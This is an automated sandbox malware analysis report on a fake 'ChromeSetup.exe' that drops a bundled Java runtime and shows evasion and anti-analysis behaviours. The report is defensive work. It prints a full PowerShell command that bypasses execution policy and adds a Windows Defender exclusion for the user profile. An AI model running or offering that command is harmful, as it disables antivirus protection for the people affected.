Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\management.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\mlib_image.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\wsdetect.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dcpr.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 516	Thread sleep count: 5946 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176	Thread sleep count: 3763 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5304	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1976	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\deploy	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\	Jump to behavior

Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: l{constant pool}code cache C-heap hand metaspace chunks dict zone strs syms heap threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be klassguarantee(is_constantPool()) failedvtable restored by this call<pseudo-string> cache=0x%08x (extra) for /operands[%d]/preresolutionconstant pool [%d]A constant pool lockC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\constantPool.cppguarantee(!ConstantPool::is_invokedynamic_index(which)) failedan invokedynamic instruction does not have a klassRESOLVE %s %s
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp, classlist.0.dr	Binary or memory string: java/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Unable to link/verify VirtualMachineError class
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t[Ljava/lang/VirtualMachineError;
Source: svchost.exe, 00000007.00000002.2860824933.000001C7D6C54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2860164381.000001C7D162B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )Q+com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lVirtualMachineError.java
Source: javaw.exe, 00000002.00000002.3382950654.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\ChromeSetup.exe

Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Code function: 1_2_00401150 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,

1_2_00401150

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE	Jump to behavior

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1631885
Product:	CloudBasic
Start time:	16:57:36
Start date:	07.03.2025
Sample:	ChromeSetup.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	399c3320b324ff609891de75be32bf73
SHA1:	70aed741554513d96f31109033f8e4fff17e7633
SHA256:	7544df9edd35749e132b8f586cef88127dcbea491ab128271fc3b2abd94e01d5
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report ChromeSetup.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Signatures

AV Detection

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted URLs

Windows Analysis Report
ChromeSetup.exe